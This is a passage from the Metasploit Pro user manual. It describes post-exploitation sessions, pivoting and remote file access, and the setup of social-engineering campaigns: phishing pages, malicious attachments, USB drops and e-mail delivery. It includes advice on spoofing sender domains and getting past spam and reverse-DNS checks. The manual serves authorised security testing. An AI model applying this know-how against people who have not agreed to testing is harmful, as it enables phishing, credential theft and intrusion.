Metasploit Pro opens an active session on a target system if an exploit or bruteforce attack is successful. An active session enables you to interact with and run tasks against the compromised host. A session can be a Meterpreter or command shell session. The type of session that Metasploit Pro opens depends on the type of attack that the system used to obtain the session. The session type depends on the mechanism that the attacker uses to create the session and the type of environment on which the session runs. To determine a the session type, open the Sessions window and view the Type column. The Type column lists each session for the session appears. An active session enables you to take control of the session to perform tasks within the target system.
Command Shell Session

A command shell session runs a collection of scripts and provides a shell that you can use to run arbitrary commands against the host. Metasploit Pro opens a command shell session when the following events occur:
l
Successful exploit on *nix SSH bruteforce on *nix Telnet bruteforce on *nix Tomcat bruteforce on *nix
Interacting with Command Shell Sessions

The command shell functions as a terminal emulator. You can use the command shell to run any noninteractive process on the target host. Note: You must have open sessions in order to use the command shell. 1. From within a project, click the Sessions tab. 2. When the Sessions window appears, click on the active session that you want to open. The session must be a shell session. 3. Click Command Shell from the Available Actions area. A simulated command shell opens in a new tab in the browser window.
Active Sessions
330
Meterpreter Sessions
A Meterpreter session enables you to use VNC to gain access to the device and enables you to use a built-in file browser to upload or download sensitive information. Meterpreter shells are currently only available for Windows. Metasploit Pro opens a Meterpreter session when the following events occur:
l
Successful exploit on Windows SSH bruteforce on Windows Telnet bruteforce on Windows SMB bruteforce on Windows Tomcat bruteforce on Windows
Interacting with Meterpreter Sessions

Before you can interact with a Meterpreter session, you must have an active session on a compromised Windows target. 1. From within a project, click the Sessions tab. 2. When the Sessions window appears, click on the active session that you want to open. The session must be a Meterpreter session. 3. Click Virtual Desktop from the Available Actions area. 4. Choose the Java client or choose to manually connect to an external client.
Authentication Notes
All successful authentication results in an authentication note attached to the host and an entry in the corresponding reports. Some protocols and servers do not allow you to execute commands directly. For example, you can utilize FTP to bruteforce credentials, but after the attack finds a valid credential, you cannot run commands directly on the server. Therefore, the attacker cannot obtain a session. When a case like this occurs during a bruteforce attack or an exploit, an alert appears on the Analysis tab that indicates that the system identified a valid account, but could not create a session. If the system identifies new credential information for a particular host, you can use the credentials to authenticate the host outside Metasploit Pro.
Meterpreter Sessions
331
Session Tasks
A session task is an action that you can perform within the active session. For example, an action enables you to collect evidence, access the file system, run a command shell, and create a pivot through the compromised host.
Session Details
The session details describe information about a particular session, such as the session type and attack module that Metasploit Pro used to obtain the session. Additionally, when you view the session details for an active session, you can access the actions that available for that session. The session details for a closed session describe the event history for the session.
Viewing Details for a Session

1. Open a project. Click the Sessions tab. The Sessions window appears. 2. Click on an active session name. 3. The session details appear and show the actions that are available for the session.
Proxy Pivot
A proxy pivot send attacks through the remote host and uses the remote host as a gateway over TCP/UDP. When a proxy pivot is active, discovery scans, bruteforce, and exploitation tasks source from the pivoted host. Note: Metasploit Pro does not support IPv6 addresses for pivoting.
Creating a Proxy Pivot

1. From within a project, click the Sessions tab. 2. When the Sessions window appears, click on an active session name. 3. When the session details page appears, click the Create Proxy Pivot button. Metasploit Pro automatically creates a route for the session.
VPN Pivot
A VPN pivot creates a type of VPN tunnel to an exploited Windows host and turns the host into a pivot point for traffic. To create a VPN pivot, Metasploit Pro creates a a hook at the kernel level of the target
Session Tasks
332
system. The hook does not create an interface on the remote system and acts as a sniffer to return all traffic that Metasploit Pro initiates. When Metasploit Pro creates a VPN Pivot, the VPN Pivot appears as a local interface, which enables you to use IP forwarding and use the interface as a gateway to the target network. However, Metasploit Pro cannot create a bridge to a network that it is already attached to because it creates a conflicting route for the target network system. Therefore, you must verify that Metasploit Pro does not have an existing direct connection to any networks that have the same IP range and netmask as the target network. Note: Metasploit Pro does not support IPv6 addresses for pivoting.
Virtual Interfaces
In order to provide VPN pivot functionality on the Windows platform, Metasploit Pro must install a new network driver. The driver, msftap.sys, creates four virtual interfaces on the installed system, which provides the ability to run up to four concurrent VPN Pivot sessions. If Metasploit Pro does not locate the virtual interfaces when MetasploitProSvc starts, Metasploit Pro automatically installs the network drivers. To reinstall or uninstall these drivers, you can use one of the batch scripts that are available. You can locate the batch scripts at: $INSTALLROOT\apps\pro\data\drivers\<arch>\. You can use the scripts to disable the VPN Pivot virtual interfaces or restore a previously removed driver.
VNC Sessions
You can use an active Meterpreter session to obtain a VNC session with the compromised system. You can either connect to the remote desktop manually or use the VNC client that is available through Metasploit Pro. The VNC client is a Java applet that you can use to remote desktop to the target system. Before you use the Java applet, install the latest Java for your platform. You can download the latest version of Java at http://www.java.com/en/download/manual.jsp. If you do not want to use the Java applet, you can use an external client, such as VNC Viewer.
Opening a VNC Session

1. From within a project, click the Sessions tab. 2. When the Sessions window appears, click on an active session. 3. When the session details page appears, click the Virtual Desktop button to connect to the remote desktop.
Virtual Interfaces
333
4. When the confirmation window appears, click OK to continue. 5. Choose to connect manually or to use a Java applet.
File Systems
For Meterpreter sessions, you can use the Metasploit Pro interface to browse the file system on the compromised system. Additionally, you can upload, download, or delete files.
Accessing the File System

1. From within a project, click the Sessions tab. 2. When the Sessions window appears, click on an active session. 3. When the session details page appears, click the Access File System button. A new window appears and displays the remote file system.
Uploading a File to a File System

1. From within a project, click the Sessions tab. 2. When the Sessions window appears, click on an active session to open the session details page. 3. When the session details page appears, click the Access File System button. A new window appears and displays the remote file system. 4. Select the directory that you want to use to upload the file. You can enter the directory path or navigate through the directory and select the directory path that you want to use. 5. Click the Upload button. 6. Browse to the location of the file that you want to upload. After you locate the file, select and open the file. 7. Enter a name for the file. If you do not specify a name, the file uses empty as the name. 8. If you want to run the file after you upload the file to the file system, select the Run the file option. 9. Upload the file.
Searching the File System

1. From within a project, click the Sessions tab. 2. When the sessions window appears, click on an active session. 3. When the session details page appears, click the Search File System button. 4. A new window appears and displays the remote file system. Enter the file name that you want to use to perform the search. Press Enter.
File Systems
334
Chapter 17:
Social Engineering
To learn more about social engineering, read the following topics:

l
About Social Engineering on page 336 Social Engineering Techniques on page 338 Social Engineering Components on page 341 Social Engineering Workflow on page 342 Campaign Dashboard on page 346 Campaign Management on page 351 Reusable Campaign Resources on page 372 USB Key Campaigns on page 383 Phishing Campaigns on page 387 Social Engineering Report on page 393
About Social Engineering

Social engineering is a method of attack that typically uses a delivery tool, like e-mail or a USB key, to induce a target to share sensitive information or to perform an action that enables an attacker to compromise the system. You perform social engineering tests to gauge how well the members of an organization adhere to security policies or to identify the security vulnerabilities created by people and processes in an organization. In Metasploit Pro, you create and run campaigns to perform social engineering attacks. A campaign contains the e-mails, web pages, and portable files that you need to run a social engineering attack against a group of human targets. You can set up campaigns to perform phishing attacks, launch client-side exploits, run Java signed applets, generate executables for USB key drops, and send out e-mails with malicious attachments. The campaign tracks the number of human targets that fall victim to the attack and presents the results in a social engineering report. You can read the report to review the metrics for the campaign, learn about remediation recommendations, and determine the effectiveness of the campaign.Additionally, the campaign page shows real-time statistics that provide you with a high-level overview of the campaign results. For example, you can view the number of recipients who opened the e-mail or filled out the web form in a phishing campaign. The data that you gather from a social engineering campaign can help paint a clearer picture of the risks and vulnerabilities that exist in their organization and security infrastructure. An organization can leverage the test results to improve their security posture and increase security awareness.
Social Engineering for Metasploit 4.4 and Older

If you have campaigns that you created with Metasploit Pro versions 4.4 and earlier, you can still access them to generate reports. However, you cannot run a legacy campaign in Metasploit Pro 4.5 or migrate the campaign content over to the new style of campaigns. To access legacy campaigns, use the following URL: https://<metasploit_ instance>:3790/workspaces/<n>/campaigns, where n represents the workspace ID assigned to a project. For example, the default project has a workspace ID of 1, so to access the old campaigns for that project on the local Metasploit instance, use the following URL: https://localhost:3790/workspaces/1/campaigns.
Viewing Legacy Campaigns

1. Log in to your instance of Metasploit Pro. 2. When the Projects page appears, click on a project name to open it.
About Social Engineering
336
3. Locate the browser address bar. 4. Append /campaigns to the end of the URL and press Enter. The old campaigns area appears.
Generating a Report for Legacy Campaigns

1. Log in to your instance of Metasploit Pro. 2. When the Projects page appears, find the project that contains the campaign that you want to generate a report for and click on the project name to open it. 3. From the Tasks bar, click the Reports tab. 4. From the Quick Tasks bar, click the Standard Report button. 5. From the Report Type dropdown, select Pre-4.5 Campaigns (Deprecated). 6. Select the report format, sections, and options that you want Metasploit Pro to use for the report. 7. When you are ready to generate the report, click the Generate button. Metasploit Pro takes you to the Tasks log where you can view the progress of the report generation. When the report is ready, the task status will change to completed. 8. To view the report, click on the Reports tab and find the name of the report that Metasploit Pro just generated. 9. Click the View or Download link to access the report.
Generating a Report for Legacy Campaigns
337
Social Engineering Techniques

The main goal of social engineering is to entice a victim to perform some illicit action that enables you to either exploit their system or to collect information from them. Social engineering typically uses e-mail based attacks that target client-side vulnerabilities, which are exploitable through vectors that only a local user can reach. These attacks usually leverage file format exploits and client-side exploits to target the applications and information stored on a victims local machine or phishing scams to gather information from a human target. For example, you can attach a PDF that contains an exploit, like the Cooltype exploit, to an e-mail and send the e-mail to a group of people. When a recipient opens the infected PDF, it can create a session on their machine if it is vulnerable to the Cooltype exploit. The method that you choose depends on the intent and purpose of the social engineering attack. For example, if you want to see how well an organization handles solicitation e-mails, you can set up a phishing attack. If you want to gauge how well an organization follows security best practices, you can generate a standalone executable file, load it onto a USB key, and perform a USB key drop. Read the following sections for more information on the types of social engineering techniques that Metasploit Pro offers.
Phishing
Phishing is a social engineering technique that attempts to acquire sensitive information, such as user names, passwords, and credit card information, from a human target. During a phishing attack, a human target receives a bogus e-mail disguised as an authentic e-mail from a trusted source, like a financial institution. The e-mail contains a link to open a fake web page that looks nearly identical to the official site. The style, logo, and images may appear exactly as they are on the real website. If the human target fills out the web form, you can collect the information as evidence. To set up a phishing attack in Metasploit Pro, you need to create a campaign that contains the following components:
l
E-mail component - Defines the content that you want to send in the e-mail body, and the human targets that you want to receive the phishing attack. Each campaign can only contain one e-mail component. Web page component - Defines the web page path, the HTML content, and the redirect URL. The web page that you create must contain a form that a human target can use to submit information.
When you run the campaign, Metasploit Pro creates a web server on your local system to host the web page. When a human target clicks on the tracking link and visits the web page, Metasploit Pro records the visit and any information that the human target submits through the web form.
Social Engineering Techniques
338
Client-Side Exploits
A client-side exploit attacks vulnerabilities in client software, such as web browsers, e-mail applications, and media players. In a client-side exploit, the victim must visit a malicious site in order for the exploit to run. A client-side exploit is different from a traditional exploit because it requires the victim to initiate the connection between their machine and an attacking machine. Traditional exploits, on the other hand, do not require human interaction. When a human target visits the web page that contains the exploit, a session opens on the targets machine and gives you shell access to the targets system, if the targets system is vulnerable to the exploit. Using the session, you can do things like capture screenshots, collect password files, and pivot to other areas of the network. To set up a file format or client-side exploit in Metasploit Pro, you need to create a campaign that contains the following components: E-mail component - Defines the content that you want to send in the e-mail body and the human targets that you want to receive the e-mail. You can provide a link to the web page that serves the exploit. Web page component (optional) - Sets the web page component to send a client-side exploit and defines the tracking URL, and the HTML content for the web page.
File Format Exploits

File format exploits are attacks that take advantage of a vulnerability in the way that an application processes data in a particular kind of file format, such as PDF, DOC, or JPEG. A file format exploit can run when a human target opens a attachment that contains the exploit. For example, you can attach a malicious Word document that contains an exploit, like MS11-006, to an e-mail. When the human target downloads and views the attachment (in thumbnail view), a session opens on the targets machine and gives you a shell to access their system. To set up an e-mail attachment attack in Metasploit Pro, you need to create a campaign that contains the following component:
l
E-mail component - Attaches a file format exploit to the e-mail and defines the content that you want to send in the e-mail body, and the human targets that you want to receive the e-mail. Portable file component - Generates a file format exploit that you can store on a USB key.
Java Signed Applets

The Java Signed Applet Social Engineering Code Execution module creates a jar file and signs it. You deliver the Java signed applet to a human target from a web page that contains an applet tag. When a human target visits the web page, the targets Java Virtual Machine asks the human target if they trust the signed applet. If the human target runs the applet, it creates a session on the victims machine and gives you full user permissions to their system.
Client-Side Exploits
339
Portable Files
A portable file can be used for a USB drive drop. A portable file can be a generated executable file or a file format exploit that you load onto a USB key. When a human target installs the USB drive and opens the file, a connection is created from the targets machine to the attacking machine. To create a portable file in Metasploit Pro, you need to create a campaign that contains the following component:
l
Portable file component - Generates an executable or file format exploit that you can store on a USB key.
Portable Files
340
Social Engineering Components

A social engineering attack consists of the following components:
l
Campaign - A logical grouping of components that you need to perform a social engineering attack. Campaign component - A building block for a social engineering campaign. A campaign component can be an e-mail, a web page, or a portable file. Template - Reusable, shell of HTML containing boilerplate that it's useful to make available across campaigns. Create and use a template to quickly generate web page or e-mail content for a campaign. Target list - A list that defines the recipients and their e-mail addresses that will receive an e-mail. The campaign sends the social engineering attack to the target list. Use CSV formatting to create a target list. The CSV file must include the following header row: email_address, first_name, last_name.
Social Engineering Components
341
Social Engineering Workflow

Use the following general steps to set up a social engineering campaign: 1. Upload or create target lists. 2. Create a campaign. 3. Add a campaign component. 4. Configure the campaign component. 5. Configure any necessary servers. 6. Run the campaign. 7. View the campaign statistics to track the actions of the recipients. 8. Stop the campaign. 9. Generate a social engineering report.
Social Engineering Workflow
342
Social Engineering Terminology

Before you can create social engineering campaigns, you should familiarize yourself with the terms used for social engineering.
Browser Autopwn
Browser Autopwn is a module that fingerprints HTTP clients and enables you to automatically exploit them based on their browser type. When you run Browser Autopwn, a web server starts on your local system and loads it with browser exploits. This module automatically launches browser exploits against the victims machine until an exploit successfully compromises the system. When you run Browser Autopwn, a web server starts on your local system and runs a malicious site. When a victim visits the site, any applicable exploits are attempted, and if one is successful, a Meterpreter session starts and enables you to access the victims machine.
Campaign
A campaign is a logical grouping of components that you need to perform a social engineering attack. A campaign can contain only contain one e-mail component, but can have multiple web pages or portable files.
Click Tracking
Click tracking is a method of client-side testing that tracks the number of human targets that click on a link. To implement click tracking, you need to set up a web page to which you direct a human target. The web page tracks the number of visits and helps an organization identify how susceptible their infrastructure is to a real attack.
E-mail Template
An e-mail template contains predefined HTML content that you can insert into an e-mail.
Executable
An executable file that automatically runs when a human target opens the file. The executable runs a payload that creates a connection from the exploited machine back to the attacking machine.
File Format Exploit

A file format exploit targets a vulnerability in a specific application, such as Microsoft Word or Adobe PDF.
Social Engineering Terminology
343
Human Target
A human target is the person who receives the social engineering attack or is part of a campaign.
Phishing Attack
A phishing attack is a form of social engineering that attempts to acquire sensitive information, such as user names, passwords, and credit card information, from a human target. During a phishing attack, a human target receives a bogus e-mail disguised as an authentic e-mail from a trusted source, like the bank. Generally, the e-mail contains a link that opens a fake web page that looks nearly identical to the official site. The style, logo, and other images may appear exactly as they are on the real website.
Portable File
A generated executable file that you can attach to an e-mail or save to a USB key. When the victim opens the file, the executable runs the payload, starts a session on the victims machine, and connects back to your machine.
Resource File
A resource file refers to a web page template, e-mail template, or target list. It is a reusable file that you can use in a campaign. Each project has its own set of resource files. The resource files are not shareable between projects.
Social Engineering
Social engineering is an attack method that uses a delivery mechanism, such as e-mail or a USB key, to either trick a victim into providing sensitive information or compromise their machine by means of an exploit.
Target List
A target list defines the targets that you want to include in the social engineering campaign. You use the target list to specify the recipients that you want to e-mail the social engineering attack.
Tracking GIF
A tracking GIF sets a browser cookie when a human target opens an e-mail.
Human Target
344
Tracking Link
A tracking link consists of a URL path to a web page and a tracking string. When a target clicks on the URL, the system sets a cookie to track the visit and any subsequent visits.
Tracking String
A tracking string is a 64 bit string that encodes the target and e-mail IDs. Campaigns use tracking strings to monitor the activity of a target.
Visit
A visit occurs when a target clicks on a link and opens the web page.
Web Template
An web template contains predefined HTML content that you can insert into a web page.
Tracking Link
345
Campaign Dashboard
The Campaign Dashboard contains the interfaces and tools that you need to set up social engineering campaigns. It provides you with access to the campaigns, target lists, and resource files that are in a project. The Campaign Dashboard is made up of the campaign tasks bar, modal windows, campaign widgets, and action links.
Campaign Tasks Bar

When you access the Campaign Dashboard, you will see the Campaign Tasks bar below the main Tasks bar. Each tab in the Campaign Tasks bar represents a major section of functionality within social engineering. Click on the tabs to switch to between the campaign configuration, campaign management, and campaign elements areas.
The Campaign Tasks bar contains the following tabs:

l
Configure a Campaign - Displays the campaign editor. Use the campaign editor to create new campaigns and edit existing campaigns. Manage Campaigns - Shows a list of campaigns that are currently in the project. Next to each campaign listing is a set of action links. Use these action links to edit, delete, reset, preview, and start/stop a campaign. Manage Reusable Resources- Provides a management interface for reusable campaign resources, such as e-mail templates, web page templates, target lists, and malicious files.
Campaign Dashboard
346
Campaign Widgets
A campaign widget is an icon that represents a campaign component. When you click on the campaign widget, it opens a modal window that displays the configuration form for that campaign component.
Modal Windows
A modal window is a small pop-up window that requires you to interact with it before you can go back to the main window. Typically, modal windows are used to display alerts and confirmation windows. In Metasploit Pro, modal windows guide you through the process of setting up campaign components. To exit a modal window, you must either complete the required form data, or you can click the X to exit the screen.
Action Links
An action link is an interactive link that you can click on to perform a specific task. Each campaign has a set of action links that are available for you to use. The following action links are available to each campaign:
l
Start - Launch the campaign. Stop - Stop the campaign.
Campaign Widgets
347
Preview - Generate a preview of an e-mail and web page. Reset - Reset the statistics and data in a campaign. Edit - Edit the current configuration for campaign components. Delete - Remove the campaign and its data from the project.
The following image shows the action links that are available for a campaign:
Action Links
348
Campaigns
A campaign is a logical grouping of the campaign components that you need to exploit or phish a group of people. A campaign can be comprised of the following campaign components: e-mail, web page, or portable file. The components that you add to the campaign depend on the purpose and goal of the social engineering attack.
Campaign Restrictions
The following restrictions apply to campaigns:
l
A campaign can only contain one e-mail. A campaign that you build with the canned phishing campaign can only contain one e-mail and up to two web pages. One web page is used for the landing page, and the other web page is used for the redirect page. If you need additional redirect pages, do not use the canned phishing campaign to create a campaign, use the custom campaign builder instead. Each instance of Metasploit Pro can only run one campaign at a time. Metasploit Pro does not serve images or asset files locally. If you manually create a web page, you must define fully qualified URLs.
Campaign States
A campaign state describes the current status of a campaign. At any given point in time, a campaign can be in one of the following states:
l
Unconfigured - The campaign does not contain any components. Preparing - The campaign is getting ready to run. Launchable - The campaign is ready to start. Running - The campaign is online. For campaigns that have a web page, this means that the web page is online and accessible to target machines that can reach the Metasploit instance. For campaigns that contain an e-mail, this means that Metasploit Pro has attempted to send the email to the target list through your mail server. For campaigns that contain portable files, this means that handler is ready and waiting for incoming connections from target machines.
Finished - The campaign is no longer active.
Campaigns
349
For campaigns that have a web page, this means that the web page is no longer accessible and cannot be viewed by anyone. For campaigns that contain portable files, this means that the handler is no longer listening for incoming connections.
Campaign States
350
Campaign Management
A campaign is a grouping of components that you need to set up a social engineering attack. You create campaigns to configure and manage campaign components, such as e-mails, web pages, and portable files.
Creating a Campaign
1. From within a project, select Campaigns from the Tasks menu. The Manage Campaigns area appears. 2. Click the Configure a Campaign tab. 3. When the Configure a Campaign area appears, enter a name for the campaign in the Name field. 4. Choose one of the following setup options:
l
Phishing Campaign - Metasploit Pro automatically creates a campaign that has the necessary campaign components for a phishing attack. The canned phishing campaign contains an e-mail component and two web page components that you configure to set up the landing page and the redirect page. Custom Campaign - You manually create the campaign and add the campaign components that you need to it. A custom campaign can contain any combination of campaign components.
Now youre ready to customize the campaign. If the campaign is empty, you will need to add a component to it. For example, if you want to generate an executable to save to a USB key, you can add a portable file component.
Editing the Campaign Name

1. From within a project, select Campaigns from the Tasks menu. 2. When the Manage Campaigns area appears, find the campaign that you want to edit. 3. Click the Edit link. 4. When the campaign configuration page appears, delete the existing campaign name from the Name field. 5. Enter the new campaign name in the Name field. 6. Click the Save button.
Campaign Management
351
Running a Campaign
1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that you want to run. The campaign status must be launchable for the campaign to run. A launchable status indicates that all necessary components of the campaign are configured. 3. Click the Start link.
Clearing the Data from a Campaign

When you reset the campaign, you clear all the statistics and data collected by the campaign. A campaign reset removes any data collected through form submissions, the statistics for a phishing attack, and the statistics for e-mail tracking. 1. From within a project, select Campaigns from the Tasks menu.
2. When the Manage Campaigns area appears, find the campaign that you want to reset.
3. Click the Reset link.
Running a Campaign
352
4. When the confirmation window appears, click OK to confirm that you want to reset the data in the campaign.
Viewing the Findings for a Campaign

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign whose results you want to view. 3. Click the Findings link. The Findings window appears and displays the statistics for the entire campaign. You will see the total number human targets that received an e-mail, opened the e-mail, visited the phishing web page, and submitted the web page form. 4. Click on a stat bubble to view the findings for that a list of human targets associated with that statistic. For example, if you view the findings for the recipients who filled out the web form, you will see the name and e-mail of the human target that submitted the web form. If you click on their e-mail address, you will see the data that they submitted. 5. Click the Done button to close the Findings window.
Adding a Campaign Component

1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns area appears, find the campaign that you want to edit and click the Edit link.
3. When the campaign configuration page appears, click the Add e-mail, web page, or portable file button. You can only add components to a campaign that uses the custom setup. You cannot add components to a campaign that you created with the canned phishing campaign.
Viewing the Findings for a Campaign
353
4. Click on the campaign component that you want to add. After you add the component, the configuration page for the component appears. Follow the onscreen instructions to configure the component.
Removing a Campaign Component

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that you want to edit and click the Edit link. 3. When the campaign configuration page appears, click the Edit button located under Campaign Components. The component icons show red Xs that you can use to remove a component from the campaign. 4. Click the X button for the component that you want to remove. 5. Click the Done button when you finish.
Stopping a Campaign
1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that you want to stop. 3. Click the Stop link.
Removing a Campaign Component
354
Sending an E-mail Notification when a Campaign Starts

Before you configure an e-mail notification, you should verify that the SMTP settings for your mail server have been configured for Metasploit Pro. Go to Administration > Global Settings to view your SMTP settings. 1. From the campaign configuration form, locate the Notifications area. 2. Select the Notify others before launching the campaign option. 3. When the Notification Settings window appears, enter the e-mail addresses of the people who you want to send the alert in the To field. To include multiple e-mail addresses, use a comma separated list of e-mail addresses. For example, you can enter a list like the following: joe@rapid7.com, mary@rapid7.com, jon@rapid7.com. 4. In the Subject field, enter the subject that you want the e-mail to display. By default, Metasploit Pro auto-fills the subject for you with a canned subject line. 5. In the Message field, enter the information, or body, that you want to send in the e-mail. For example, you may want to say something like, This is a company wide alert to inform you that we are starting our security awareness program. If you have any questions, please contact John Smith. 6. When you are done creating the notification e-mail, click the Save button.
Uploading a Malicious File

1. From within a project, click the Campaigns tab. 2. Click the Manage Reusable Resources tab. 3. From the Resource dropdown, select Malicious Files. 4. Click the New Malicious File button. 5. In the File name field, enter the name of the file that you are importing. The file name must include the file extension. For example, if you are uploading an executable file, the file name should include the exe extension. 6. Click the Browse button to navigate to the location of the file that you want to upload. Once you have found and selected the file, click the Open button. The path to the file will appear in the Attachment field. 7. Click the Save button.
Deleting a Campaign
1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that you want to delete. 3. Click the Delete button.
Sending an E-mail Notification when a Campaign Starts
355
4. When the confirmation window appears, click OK to confirm that you want to permanently delete the campaign. All target lists and campaign components will be deleted from the project. You will no longer be able to view, run, or edit the campaign.
Exporting a CSV File of Campaign Findings

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export. 3. Click the Findings link. 4. Click on the stat bubble that represents the data that you want to export. For example, if you want to export the list of human targets that opened the e-mail, click on the n% recipients opened the e-mail stat bubble. A list of human targets and the Export Data button appears. 5. Click the Export Data button. 6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.
Exporting a CSV File of E-mail Sent from a Campaign

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export. 3. Click the Findings link. 4. Click on the #n e-mails were sent stat bubble. A list of human targets and the Export Data button appears. 5. Click the Export Data button. 6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.
Exporting a CSV File of Human Targets that Opened the E-mail

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export. 3. Click the Findings link. 4. Click on the %n of recipients opened the e-mail stat bubble. A list of human targets and the Export Data button appears.
Exporting a CSV File of Campaign Findings
356
5. Click the Export Data button. 6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.
Exporting a CSV File of Human Targets that Clicked on the Link

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export. 3. Click the Findings link. 4. Click on the %n of openers clicked on linkstat bubble. A list of human targets and the Export Data button appears. 5. Click the Export Data button. 6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.
Exporting a CSV File of Human Targets that Submitted the Form

1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign that contains the data that you want to export. 3. Click the Findings link. 4. Click on the %n of openers submitted the form stat bubble. A list of human targets and the Export Data button appears. 5. Click the Export Data button. 6. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.
Exporting a CSV File of Human Targets that Clicked on the Link
357
Campaign Components
In a social engineering attack, there is typically a delivery tool and an attack method. To configure a delivery tool and attack method for a social engineering attack, you use campaign components. A campaign component refers to an e-mail, web page, or portable file. It is a configurable component that you use to build a social engineering campaign. Each campaign must have at least one campaign component. Most campaigns will have an e-mail component because it is the most commonly used delivery method for social engineering. In addition to the e-mail component, you can add web pages to build phishing scams or add portable files to create file attachment attacks. For example, you can set up a phishing attack with an e-mail component and a web page component. The e-mail component defines the header and content that you want to e-mail to a target list, and the web page component sets up the landing and redirect pages that the target visits.
E-mail
E-mail is the delivery tool that you use to send social engineering attacks to your target list. An e-mail defines the header and the content that you want the victim to read. To send e-mail, you must have provide Metasploit Pro with the SMTP settings to your local mail server or a cloud based mail delivery service. Metasploit Pro does not include a built-in mail transfer agent. You must have access to your own mail server. If you intend to reuse the e-mail content in other campaigns, you can create an e-mail template that predefines the content for the e-mail body. An e-mail template enables you to quickly insert content into an e-mail without having to recreate the content each time you create a campaign. After you create the e-mail template, you will be able to apply it to an e-mail in any campaign within the project. Tip: As a general best practice, you should create the e-mail component after you create a web page component. Some features that you may need access to, such as web page links, may not be available if you create the e-mail first.
E-mail Options
The following options are available for you to configure for the e-mail component:
l
Name - The name of the e-mail component. The name displays on the campaign component tab. Subject - The subject that displays in the message header and the subject line. From Address - The senders e-mail address or the display name.
Campaign Components
358
From Name - The senders name. Target List - The list of targets, or recipients, that you want to receive the e-mail.
Mail Server Requirements

Before you can configure Metasploit Pro to send e-mail through a mail server, please make sure that it meets the following requirements:
l
The mail server does not perform reverse DNS lookup to verify that the IP address of the server hosting Metasploit Pro matches the domain of the e-mail address that you are trying to spoof. If the mail server performs reverse DNS lookup, the server will reject the e-mail and refuse to deliver it. The mail server does not perform restrictive checks for spam, malicious files, or any type of e-mail abuse. Basically, the mail server should use the lowest levels of protection against spam and junk mail. For example, publicly available e-mail services like Gmail, Yahoo, and Hotmail enforce extremely high levels of security and will most likely blacklist any e-mail that appears to be spam. Due to these restrictions, it is recommended that you do not use these types of e-mail services.
If the mail server is provided through an e-mail relay service, please check the terms of service for spam or bandwidth restrictions. Many of these providers will track your account to ensure that you are not using it to abuse their services. If any of your e-mail recipients flag your e-mail as spam, this will alert the provider that you may be potentially abusing their system and may cause them to blacklist your e-mail. Some relay service providers may require that you take the time to build a reputation as a legitimate e-mail sender, otherwise, many Internet Service Providers will immediately begin to flag your e-mail as spam. Since volume is typically a huge indicator of spam, you should probably keep the number of outgoing e-mails to below the relay services recommended volume.
The SMTP port used to send mail is not blocked by the server running Metasploit Pro.
Common Mail Server Errors

While attempting to send e-mail, you may encounter some errors that prevent you from successfully delivering e-mail. If you are having problems getting your mail server to deliver mail, please go to the task log and search for any text highlighted in red or any text tagged as an error. You can use the error message to help troubleshoot the issue.
No Valid Recipients
This error indicates that the domain you are trying to spoof does not match the originating IP address for a reverse DNS lookup. To workaround this issue:
E-mail
359
You can disable reverse DNS lookup on the mail server. You can set up a proxy or IP address that enables the phishing e-mail to act as if it were coming from a legitimate origin.
The Server Refused Our Mail

This error indicates that the mail server has flagged the e-mail as spam and has refused to deliver the email. To work around this issue:
l
You can lower your mail servers security level for unknown and untrusted senders, and you can lower your mail servers security level for spam. You can utilize an e-mail relay service, such as Sendgrid, JangoSMTP, or Mandrill. These e-mail services provide its users the ability to configure the level of security that is enforced on outgoing mail and the ability to send bulk mail. Additionally, these e-mail relay services are more likely to reliably deliver e-mail successfully. However, before you decide to use an e-mail relay service, please check the terms of service agreement to verify that the provider will not blacklist your e-mails if they are classified as spam.
Sender E-mail Address Does Not Match with the User Account
This error most likely results from a reverse DNS lookup that determined that the IP address of the e-mail did not match the host name that it is trying to spoof. To workaround this issue:
l
You can disable reverse DNS lookup. You can set up a proxy or IP address that enables the phishing e-mail to act as if it were coming from a legitimate origin. You can set up a local SMTP server on the server that runs Metasploit Pro. On Linux machines, you can use SendMail or Postfix. You can utilize an e-mail relay service, such as Sendgrid, JangoSMTP, or Mandrill.
The Server Has Encountered a Bad Sequence of Commands

This is a general error that you may see when the e-mail server is unable to deliver e-mail. Usually, this error is followed by an additional series of messages that you can use to troubleshoot the error. For example, you should look for the following errors:
l
Sender e-mail address does not match with the user account. The server refused our mail. No valid recipients.
E-mail
360
Defining Global SMTP Settings for All E-mail Based Campaigns

Global settings define the settings that projects can share and are useful if you have information that you want to reuse in different projects. A good example of a reusable and shareable resource is a mail server. Please note that Metasploit Pro does not include a mail transfer agent, but you can configure it to connect to a locally or remotely hosted mail server. You just need to set up the SMTP settings for your mail server through the global settings. When you globally define the SMTP settings, Metasploit Pro automatically configures the e-mail server for campaigns that contain an e-mail component. You do not need to configure any additional settings for your mail server. If there is a special case in which you do not want to use the global mail server settings, you can override them in the campaign. 1. From the main menu, select Administration > Global Settings. 2. When the Global Settings page appears, find the SMTP settings. 3. Enter the following information to configure the SMTP settings:
l
Address - The fully qualified mail server address (e.g., mail.domain.com). Port - The port that the mail server runs on. Typically, SMTP runs on Port 25. Domain - The hosted domain name for your mail server (e.g., domain.com) Username - The user name that the system uses to authenticate the mail server. Password - The password that the system uses to authenticate the mail server. Authentication - The authentication type determines the level of security and the login mechanism that is used to connect to the SMTP server.
4. Click the Update button to save the settings.
Defining SMTP Settings for a Campaign

